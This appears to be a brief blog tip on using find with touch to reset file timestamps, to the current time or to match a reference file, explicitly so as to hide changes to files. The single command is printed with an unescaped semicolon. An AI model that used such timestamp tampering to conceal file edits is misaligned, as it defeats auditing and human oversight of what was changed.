To hide your changes to a file, you can use “find” with “touch” to either simply touch the files to give them the current timestamp, or give them a the timestamp of a reference file:

  find /tmp/ -exec touch --reference=/path/to/file '{}' ;
Creative Commons Attribution-ShareAlike 3.0 Unported
This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported.